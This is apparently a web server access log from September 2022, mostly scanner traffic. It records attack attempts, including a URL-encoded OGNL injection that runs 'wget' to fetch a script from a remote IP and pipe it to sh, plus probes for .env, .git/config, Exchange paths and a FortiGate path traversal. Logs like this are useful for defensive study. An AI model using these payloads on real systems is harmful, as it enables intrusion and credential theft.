[13/Sep/2022:02:12:55 +0200] 183.136.225.35 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [13/Sep/2022:02:44:36 +0200] 162.142.125.9 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:02:44:37 +0200] 162.142.125.9 TLSv1.2 AES256-SHA "PRI * HTTP/2.0" 379 [13/Sep/2022:03:17:06 +0200] 128.14.133.58 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:03:17:13 +0200] 128.14.133.58 TLSv1.2 AES256-SHA "GET /showLogin.cc HTTP/1.1" 311 [13/Sep/2022:05:10:00 +0200] 59.35.84.240 TLSv1.2 AES256-SHA "GET / HTTP/1.0" 388 [13/Sep/2022:05:10:01 +0200] 59.35.84.240 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:05:32:34 +0200] 192.241.220.82 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335 [13/Sep/2022:05:56:13 +0200] 45.148.10.193 TLSv1.2 AES256-SHA "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cd%20%2Ftmp%3Bwget%20-qO-%20%20http%3A%2F%2F198.98.49.79%2Fexp.sh%20%7C%20sh%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 474 [13/Sep/2022:06:01:51 +0200] 162.142.125.121 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:06:01:52 +0200] 162.142.125.121 TLSv1.2 AES256-SHA "PRI * HTTP/2.0" 379 [13/Sep/2022:07:24:39 +0200] 162.142.125.121 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:07:24:40 +0200] 162.142.125.121 TLSv1.2 AES256-SHA "PRI * HTTP/2.0" 379 [13/Sep/2022:08:03:48 +0200] 144.34.180.162 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:08:06:49 +0200] 205.210.31.148 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 386 [13/Sep/2022:09:04:28 +0200] 198.235.24.27 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [13/Sep/2022:09:15:34 +0200] 192.241.208.242 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:10:44:02 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [13/Sep/2022:10:44:12 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:10:44:13 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:10:44:14 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:10:44:18 +0200] 71.6.146.185 TLSv1.2 AES256-SHA "quit" 379 [13/Sep/2022:10:44:19 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393 [13/Sep/2022:10:44:19 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394 [13/Sep/2022:10:44:20 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407 [13/Sep/2022:10:44:21 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309 [13/Sep/2022:10:44:23 +0200] 71.6.146.185 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:10:54:34 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383 [13/Sep/2022:10:54:37 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:10:54:37 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:10:54:37 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:10:54:40 +0200] 93.174.95.106 TLSv1.2 AES256-SHA "quit" 379 [13/Sep/2022:10:54:41 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393 [13/Sep/2022:10:54:41 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394 [13/Sep/2022:10:54:41 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407 [13/Sep/2022:10:54:42 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309 [13/Sep/2022:10:54:42 +0200] 93.174.95.106 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379 [13/Sep/2022:11:48:31 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:12:37:23 +0200] 138.246.253.24 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 393 [13/Sep/2022:12:59:49 +0200] 192.241.208.63 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314 [13/Sep/2022:13:02:25 +0200] 192.241.209.41 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348 [13/Sep/2022:13:04:53 +0200] 192.241.196.63 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310 [13/Sep/2022:13:37:28 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 315 [13/Sep/2022:14:06:52 +0200] 51.103.85.121 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304 [13/Sep/2022:14:06:52 +0200] 51.103.85.121 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST / HTTP/1.1" 301 [13/Sep/2022:14:13:44 +0200] 64.62.197.47 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383 [13/Sep/2022:14:19:56 +0200] 64.62.197.47 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 309 [13/Sep/2022:14:23:07 +0200] 64.62.197.47 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:14:28:10 +0200] 143.92.32.138 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 297 [13/Sep/2022:14:31:30 +0200] 164.90.153.82 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:14:37:58 +0200] 152.89.196.211 TLSv1.2 AES256-SHA "GET /actuator/gateway/routes HTTP/1.1" 315 [13/Sep/2022:15:42:14 +0200] 128.14.141.34 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:16:09:48 +0200] 18.221.17.249 TLSv1.2 AES256-SHA "GET /.git/config HTTP/1.1" 304 [13/Sep/2022:16:34:44 +0200] 180.149.125.163 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:17:06:16 +0200] 45.148.10.193 TLSv1.2 AES256-SHA "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 318 [13/Sep/2022:17:06:22 +0200] 45.148.10.193 TLSv1.2 AES256-SHA "POST /cgi-bin/mainfunction.cgi/cvmcfgupload?1=2 HTTP/1.1" 331 [13/Sep/2022:17:36:51 +0200] 152.89.196.23 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 452 [13/Sep/2022:19:45:44 +0200] 34.222.182.66 TLSv1.2 AES256-SHA "GET /.git/config HTTP/1.1" 310 [13/Sep/2022:20:45:34 +0200] 192.241.216.10 TLSv1.2 AES256-SHA "GET /version HTTP/1.1" 305 [13/Sep/2022:21:23:56 +0200] 185.180.143.7 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:21:47:57 +0200] 193.118.53.210 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [13/Sep/2022:22:04:34 +0200] 205.210.31.45 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 386 [13/Sep/2022:23:14:27 +0200] 35.90.238.11 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307 [13/Sep/2022:23:17:54 +0200] 54.149.135.186 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307 [13/Sep/2022:23:18:22 +0200] 44.242.159.72 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 314 [13/Sep/2022:23:20:46 +0200] 83.136.32.58 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "HEAD / HTTP/1.0" - [13/Sep/2022:23:53:22 +0200] 164.90.153.82 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301 [14/Sep/2022:00:05:05 +0200] 92.255.85.183 - - "-" - [14/Sep/2022:00:57:05 +0200] 34.140.248.32 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301 [14/Sep/2022:00:59:21 +0200] 20.203.22.11 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383 [14/Sep/2022:01:29:08 +0200] 109.248.6.38 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.0" 399